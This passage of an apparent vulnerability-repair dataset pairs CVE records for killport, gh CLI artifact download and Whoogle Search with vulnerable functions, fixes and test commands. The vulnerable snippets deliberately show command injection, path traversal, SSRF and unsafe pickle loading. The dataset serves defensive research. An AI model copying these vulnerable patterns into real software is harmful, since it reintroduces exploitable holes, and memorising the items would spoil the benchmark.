resolve(infs);\n });\n });\n }))\n};"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -1,5 +1,6 @@\n module.exports = function killport(port) {\n return (new Promise(function(resolve, reject) {\n+ if (!/^\\d+$/.test(port)) throw new Error('port must be a number.');\n var cmd = 'lsof -i:' + port; \n cp.exec(cmd, function(err, stdout, stderr){\n // do not check `err`, if no process found\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-54132", "cve_description": "The GitHub CLI is GitHub\u2019s official command line tool. A security vulnerability has been identified in GitHub CLI that could create or overwrite files in unintended directories when users download a malicious GitHub Actions workflow artifact through gh run download. This vulnerability stems from a GitHub Actions workflow artifact named .. when downloaded using gh run download. The artifact name and --dir flag are used to determine the artifact\u2019s download path. When the artifact is named .., the resulting files within the artifact are extracted exactly 1 directory higher than the specified --dir flag value. This vulnerability is fixed in 2.63.1.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/cli/cli", "patch_url": ["https://github.com/cli/cli/commit/1136764c369aaf0cae4ec2ee09dc35d871076932"], "programing_language": "Go", "vul_func": [{"id": "vul_go_21_1", "commit": "7c241cf", "file_path": "pkg/cmd/run/download/download.go", "start_line": 106, "end_line": 184, "snippet": "func runDownload(opts *DownloadOptions) error {\n\topts.IO.StartProgressIndicator()\n\tartifacts, err := opts.Platform.List(opts.RunID)\n\topts.IO.StopProgressIndicator()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error fetching artifacts: %w\", err)\n\t}\n\n\tnumValidArtifacts := 0\n\tfor _, a := range artifacts {\n\t\tif a.Expired {\n\t\t\tcontinue\n\t\t}\n\t\tnumValidArtifacts++\n\t}\n\tif numValidArtifacts == 0 {\n\t\treturn errors.New(\"no valid artifacts found to download\")\n\t}\n\n\twantPatterns := opts.FilePatterns\n\twantNames := opts.Names\n\tif opts.DoPrompt {\n\t\tartifactNames := set.NewStringSet()\n\t\tfor _, a := range artifacts {\n\t\t\tif !a.Expired {\n\t\t\t\tartifactNames.Add(a.Name)\n\t\t\t}\n\t\t}\n\t\toptions := artifactNames.ToSlice()\n\t\tif len(options) > 10 {\n\t\t\toptions = options[:10]\n\t\t}\n\t\tvar selected []int\n\t\tif selected, err = opts.Prompter.MultiSelect(\"Select artifacts to download:\", nil, options); err != nil {\n\t\t\treturn err\n\t\t}\n\t\twantNames = []string{}\n\t\tfor _, x := range selected {\n\t\t\twantNames = append(wantNames, options[x])\n\t\t}\n\t\tif len(wantNames) == 0 {\n\t\t\treturn errors.New(\"no artifacts selected\")\n\t\t}\n\t}\n\n\topts.IO.StartProgressIndicator()\n\tdefer opts.IO.StopProgressIndicator()\n\n\t// track downloaded artifacts and avoid re-downloading any of the same name\n\tdownloaded := set.NewStringSet()\n\tfor _, a 
:= range artifacts {\n\t\tif a.Expired {\n\t\t\tcontinue\n\t\t}\n\t\tif downloaded.Contains(a.Name) {\n\t\t\tcontinue\n\t\t}\n\t\tif len(wantNames) > 0 || len(wantPatterns) > 0 {\n\t\t\tif !matchAnyName(wantNames, a.Name) && !matchAnyPattern(wantPatterns, a.Name) {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\t\tdestDir := opts.DestinationDir\n\t\tif len(wantPatterns) != 0 || len(wantNames) != 1 {\n\t\t\tdestDir = filepath.Join(destDir, a.Name)\n\t\t}\n\t\terr := opts.Platform.Download(a.DownloadURL, destDir)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"error downloading %s: %w\", a.Name, err)\n\t\t}\n\t\tdownloaded.Add(a.Name)\n\t}\n\n\tif downloaded.Len() == 0 {\n\t\treturn errors.New(\"no artifact matches any of the names or patterns provided\")\n\t}\n\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_21_1", "commit": "1136764", "file_path": "pkg/cmd/run/download/download.go", "start_line": 106, "end_line": 211, "snippet": "func runDownload(opts *DownloadOptions) error {\n\topts.IO.StartProgressIndicator()\n\tartifacts, err := opts.Platform.List(opts.RunID)\n\topts.IO.StopProgressIndicator()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error fetching artifacts: %w\", err)\n\t}\n\n\tnumValidArtifacts := 0\n\tfor _, a := range artifacts {\n\t\tif a.Expired {\n\t\t\tcontinue\n\t\t}\n\t\tnumValidArtifacts++\n\t}\n\tif numValidArtifacts == 0 {\n\t\treturn errors.New(\"no valid artifacts found to download\")\n\t}\n\n\twantPatterns := opts.FilePatterns\n\twantNames := opts.Names\n\tif opts.DoPrompt {\n\t\tartifactNames := set.NewStringSet()\n\t\tfor _, a := range artifacts {\n\t\t\tif !a.Expired {\n\t\t\t\tartifactNames.Add(a.Name)\n\t\t\t}\n\t\t}\n\t\toptions := artifactNames.ToSlice()\n\t\tif len(options) > 10 {\n\t\t\toptions = options[:10]\n\t\t}\n\t\tvar selected []int\n\t\tif selected, err = opts.Prompter.MultiSelect(\"Select artifacts to download:\", nil, options); err != nil {\n\t\t\treturn err\n\t\t}\n\t\twantNames = []string{}\n\t\tfor _, x := range selected {\n\t\t\twantNames = append(wantNames, options[x])\n\t\t}\n\t\tif len(wantNames) == 0 {\n\t\t\treturn errors.New(\"no artifacts selected\")\n\t\t}\n\t}\n\n\topts.IO.StartProgressIndicator()\n\tdefer opts.IO.StopProgressIndicator()\n\n\t// track downloaded artifacts and avoid re-downloading any of the same name, isolate if multiple artifacts\n\tdownloaded := set.NewStringSet()\n\tisolateArtifacts := isolateArtifacts(wantNames, wantPatterns)\n\n\tfor _, a := range artifacts {\n\t\tif a.Expired {\n\t\t\tcontinue\n\t\t}\n\t\tif downloaded.Contains(a.Name) {\n\t\t\tcontinue\n\t\t}\n\t\tif len(wantNames) > 0 || len(wantPatterns) > 0 {\n\t\t\tif !matchAnyName(wantNames, a.Name) && !matchAnyPattern(wantPatterns, a.Name) {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\n\t\tdestDir := opts.DestinationDir\n\t\tif isolateArtifacts {\n\t\t\tdestDir = filepath.Join(destDir, a.Name)\n\t\t}\n\n\t\tif !filepathDescendsFrom(destDir, opts.DestinationDir) {\n\t\t\treturn fmt.Errorf(\"error downloading %s: would result in path traversal\", a.Name)\n\t\t}\n\n\t\terr := opts.Platform.Download(a.DownloadURL, destDir)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"error downloading %s: %w\", a.Name, err)\n\t\t}\n\t\tdownloaded.Add(a.Name)\n\t}\n\n\tif downloaded.Len() == 0 {\n\t\treturn errors.New(\"no artifact matches any of the names or patterns provided\")\n\t}\n\n\treturn nil\n}\n\nfunc isolateArtifacts(wantNames []string, wantPatterns []string) bool {\n\tif len(wantPatterns) > 0 {\n\t\t// Patterns can match multiple artifacts\n\t\treturn true\n\t}\n\n\tif 
len(wantNames) == 0 {\n\t\t// All artifacts wanted regardless what they are named\n\t\treturn true\n\t}\n\n\tif len(wantNames) > 1 {\n\t\t// Multiple, specific artifacts wanted\n\t\treturn true\n\t}\n\n\treturn false\n}"}, {"id": "fix_go_21_2", "commit": "1136764", "file_path": "pkg/cmd/run/download/zip.go", "start_line": 73, "end_line": 95, "snippet": "func filepathDescendsFrom(p, dir string) bool {\n\t// Regardless of the logic below, `p` is never allowed to be current directory `.` or parent directory `..`;\n\t// however, we check explicitly here before filepath.Rel(), which doesn't cover all cases.\n\tp = filepath.Clean(p)\n\n\tif p == \".\" || p == \"..\" {\n\t\treturn false\n\t}\n\n\t// filepathDescendsFrom() takes advantage of filepath.Rel() to determine if `p` is descended from `dir`:\n\t//\n\t// 1. filepath.Rel() calculates a path to traverse from a fictitious `dir` to `p`.\n\t// 2. filepath.Rel() errors in a handful of cases where absolute and relative paths are compared as well as certain traversal edge cases\n\t// For more information, https://github.com/golang/go/blob/00709919d09904b17cfe3bfeb35521cbd3fb04f8/src/path/filepath/path_test.go#L1510-L1515\n\t// 3. If the path to traverse from `dir` to `p` requires `..`, then we know `p` does not descend from / is not contained in `dir`\n\t//\n\t// As-is, this function requires the caller to ensure `p` and `dir` are either 1) both relative or 2) both absolute.\n\trelativePath, err := filepath.Rel(dir, p)\n\tif err != nil {\n\t\treturn false\n\t}\n\treturn !strings.HasPrefix(relativePath, \"..\")\n}"}], "vul_patch": "--- a/pkg/cmd/run/download/download.go\n+++ b/pkg/cmd/run/download/download.go\n@@ -46,8 +46,10 @@\n \topts.IO.StartProgressIndicator()\n \tdefer opts.IO.StopProgressIndicator()\n \n-\t// track downloaded artifacts and avoid re-downloading any of the same name\n+\t// track downloaded artifacts and avoid re-downloading any of the same name, isolate if multiple artifacts\n \tdownloaded := set.NewStringSet()\n+\tisolateArtifacts := isolateArtifacts(wantNames, wantPatterns)\n+\n \tfor _, a := range artifacts {\n \t\tif a.Expired {\n \t\t\tcontinue\n@@ -60,10 +62,16 @@\n \t\t\t\tcontinue\n \t\t\t}\n \t\t}\n+\n \t\tdestDir := opts.DestinationDir\n-\t\tif len(wantPatterns) != 0 || len(wantNames) != 1 {\n+\t\tif isolateArtifacts {\n \t\t\tdestDir = filepath.Join(destDir, a.Name)\n \t\t}\n+\n+\t\tif !filepathDescendsFrom(destDir, opts.DestinationDir) {\n+\t\t\treturn fmt.Errorf(\"error downloading %s: would result in path traversal\", a.Name)\n+\t\t}\n+\n \t\terr := opts.Platform.Download(a.DownloadURL, destDir)\n \t\tif err != nil {\n \t\t\treturn fmt.Errorf(\"error downloading %s: %w\", a.Name, err)\n@@ -77,3 +85,22 @@\n \n \treturn nil\n }\n+\n+func isolateArtifacts(wantNames []string, wantPatterns []string) bool {\n+\tif len(wantPatterns) > 0 {\n+\t\t// Patterns can match multiple artifacts\n+\t\treturn true\n+\t}\n+\n+\tif len(wantNames) == 0 {\n+\t\t// All artifacts wanted regardless what they are named\n+\t\treturn true\n+\t}\n+\n+\tif len(wantNames) > 1 {\n+\t\t// Multiple, specific artifacts wanted\n+\t\treturn true\n+\t}\n+\n+\treturn false\n+}\n\n--- /dev/null\n+++ b/pkg/cmd/run/download/zip.go\n@@ -0,0 +1,23 @@\n+func filepathDescendsFrom(p, dir string) bool {\n+\t// Regardless of the logic below, `p` is never allowed to be current directory `.` or parent directory `..`;\n+\t// however, we check explicitly here before filepath.Rel(), which doesn't cover all cases.\n+\tp = filepath.Clean(p)\n+\n+\tif p == \".\" || p == \"..\" 
{\n+\t\treturn false\n+\t}\n+\n+\t// filepathDescendsFrom() takes advantage of filepath.Rel() to determine if `p` is descended from `dir`:\n+\t//\n+\t// 1. filepath.Rel() calculates a path to traverse from a fictitious `dir` to `p`.\n+\t// 2. filepath.Rel() errors in a handful of cases where absolute and relative paths are compared as well as certain traversal edge cases\n+\t// For more information, https://github.com/golang/go/blob/00709919d09904b17cfe3bfeb35521cbd3fb04f8/src/path/filepath/path_test.go#L1510-L1515\n+\t// 3. If the path to traverse from `dir` to `p` requires `..`, then we know `p` does not descend from / is not contained in `dir`\n+\t//\n+\t// As-is, this function requires the caller to ensure `p` and `dir` are either 1) both relative or 2) both absolute.\n+\trelativePath, err := filepath.Rel(dir, p)\n+\tif err != nil {\n+\t\treturn false\n+\t}\n+\treturn !strings.HasPrefix(relativePath, \"..\")\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-54132:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/cli\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^Test_runDownload$ github.com/cli/cli/v2/pkg/cmd/run/download\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-54132:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/cli\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(Test_NewCmdDownload|Test_filepathDescendsFrom|Test_extractZip)$' github.com/cli/cli/v2/pkg/cmd/run/download"} {"cve_id": "CVE-2024-22205", "cve_description": "Whoogle Search is a self-hosted metasearch engine. In versions 0.8.3 and prior, the `window` endpoint does not sanitize user-supplied input from the `location` variable and passes it to the `send` method, which issues a `GET` request on lines 339-343 in `request.py`, leading to a server-side request forgery. This issue allows for crafting GET requests to internal and external resources on behalf of the server. For example, this issue would allow for accessing resources on the internal network that the server has access to, even though these resources may not be accessible on the internet. 
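Before the Whoogle record continues, the `filepathDescendsFrom` helper above has a direct Python analogue built on `os.path.relpath`. The sketch below is illustrative, not gh's code, and keeps the helper's contract that both arguments are either both relative or both absolute:

```python
import os

def descends_from(path, directory):
    # Mirror filepathDescendsFrom: normalize first, reject "." and
    # "..", then require that the route from directory needs no "..".
    path = os.path.normpath(path)
    if path in (".", ".."):
        return False
    rel = os.path.relpath(path, directory)
    # Plain prefix test, matching the Go helper's HasPrefix behavior;
    # conservative in that sibling names starting with ".." are also
    # rejected.
    return not rel.startswith("..")

assert descends_from("dest/artifact", "dest")
assert not descends_from("dest/..", "dest")   # an artifact named ".."
```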
This issue is fixed in version 0.8.4.\n\n", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/benbusby/whoogle-search", "patch_url": ["https://github.com/benbusby/whoogle-search/commit/3a2e0b262e4a076a20416b45e6b6f23fd265aeda"], "programing_language": "Python", "vul_func": [{"id": "vul_py_189_1", "commit": "8830615", "file_path": "app/routes.py", "start_line": 419, "end_line": 452, "snippet": "def config():\n config_disabled = (\n app.config['CONFIG_DISABLE'] or\n not valid_user_session(session))\n if request.method == 'GET':\n return json.dumps(g.user_config.__dict__)\n elif request.method == 'PUT' and not config_disabled:\n if 'name' in request.args:\n config_pkl = os.path.join(\n app.config['CONFIG_PATH'],\n request.args.get('name'))\n session['config'] = (pickle.load(open(config_pkl, 'rb'))\n if os.path.exists(config_pkl)\n else session['config'])\n return json.dumps(session['config'])\n else:\n return json.dumps({})\n elif not config_disabled:\n config_data = request.form.to_dict()\n if 'url' not in config_data or not config_data['url']:\n config_data['url'] = g.user_config.url\n\n # Save config by name to allow a user to easily load later\n if 'name' in request.args:\n pickle.dump(\n config_data,\n open(os.path.join(\n app.config['CONFIG_PATH'],\n request.args.get('name')), 'wb'))\n\n session['config'] = config_data\n return redirect(config_data['url'])\n else:\n return redirect(url_for('.index'), code=403)"}, {"id": "vul_py_189_2", "commit": "8830615", "file_path": "app/routes.py", "start_line": 465, "end_line": 490, "snippet": "def element():\n element_url = src_url = request.args.get('url')\n if element_url.startswith('gAAAAA'):\n try:\n cipher_suite = Fernet(g.session_key)\n src_url = cipher_suite.decrypt(element_url.encode()).decode()\n except (InvalidSignature, InvalidToken) as e:\n return render_template(\n 'error.html',\n error_message=str(e)), 401\n\n src_type = request.args.get('type')\n\n try:\n file_data = g.user_request.send(base_url=src_url).content\n tmp_mem = io.BytesIO()\n tmp_mem.write(file_data)\n tmp_mem.seek(0)\n\n return send_file(tmp_mem, mimetype=src_type)\n except exceptions.RequestException:\n pass\n\n empty_gif = base64.b64decode(\n 'R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==')\n return send_file(io.BytesIO(empty_gif), mimetype='image/gif')"}, {"id": "vul_py_189_3", "commit": "8830615", "file_path": "app/routes.py", "start_line": 496, "end_line": 557, "snippet": "def window():\n target_url = request.args.get('location')\n if target_url.startswith('gAAAAA'):\n cipher_suite = Fernet(g.session_key)\n target_url = cipher_suite.decrypt(target_url.encode()).decode()\n\n content_filter = Filter(\n g.session_key,\n root_url=request.url_root,\n config=g.user_config)\n target = urlparse.urlparse(target_url)\n host_url = f'{target.scheme}://{target.netloc}'\n\n get_body = g.user_request.send(base_url=target_url).text\n\n results = bsoup(get_body, 'html.parser')\n src_attrs = ['src', 'href', 'srcset', 'data-srcset', 'data-src']\n\n # Parse HTML response and replace relative links w/ absolute\n for element in results.find_all():\n for attr in src_attrs:\n if not element.has_attr(attr) or not element[attr].startswith('/'):\n continue\n\n element[attr] = host_url + 
element[attr]\n\n # Replace or remove javascript sources\n for script in results.find_all('script', {'src': True}):\n if 'nojs' in request.args:\n script.decompose()\n else:\n content_filter.update_element_src(script, 'application/javascript')\n\n # Replace all possible image attributes\n img_sources = ['src', 'data-src', 'data-srcset', 'srcset']\n for img in results.find_all('img'):\n _ = [\n content_filter.update_element_src(img, 'image/png', attr=_)\n for _ in img_sources if img.has_attr(_)\n ]\n\n # Replace all stylesheet sources\n for link in results.find_all('link', {'href': True}):\n content_filter.update_element_src(link, 'text/css', attr='href')\n\n # Use anonymous view for all links on page\n for a in results.find_all('a', {'href': True}):\n a['href'] = f'{Endpoint.window}?location=' + a['href'] + (\n '&nojs=1' if 'nojs' in request.args else '')\n\n # Remove all iframes -- these are commonly used inside of
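The Whoogle `window` snippet above fetches a user-controlled `location` server-side, which is the SSRF at issue. A generic pre-flight guard is sketched below for illustration; it is not the mitigation the Whoogle patch itself shipped:

```python
import ipaddress
import socket
from urllib.parse import urlparse

def assert_public_target(url):
    # Resolve every address behind the URL's host and refuse the fetch
    # if any of them is internal: a generic SSRF pre-flight check.
    host = urlparse(url).hostname
    if not host:
        raise ValueError("URL has no host")
    for *_, sockaddr in socket.getaddrinfo(host, None):
        # Strip any IPv6 scope id (e.g. "fe80::1%eth0") before parsing.
        ip = ipaddress.ip_address(sockaddr[0].split("%")[0])
        if (ip.is_private or ip.is_loopback
                or ip.is_unspecified or ip.is_link_local):
            raise ValueError(f"refusing internal address {ip}")
```

The usual caveat applies: a resolve-then-fetch check is still exposed to DNS rebinding, so pinning the resolved address for the actual request is advisable.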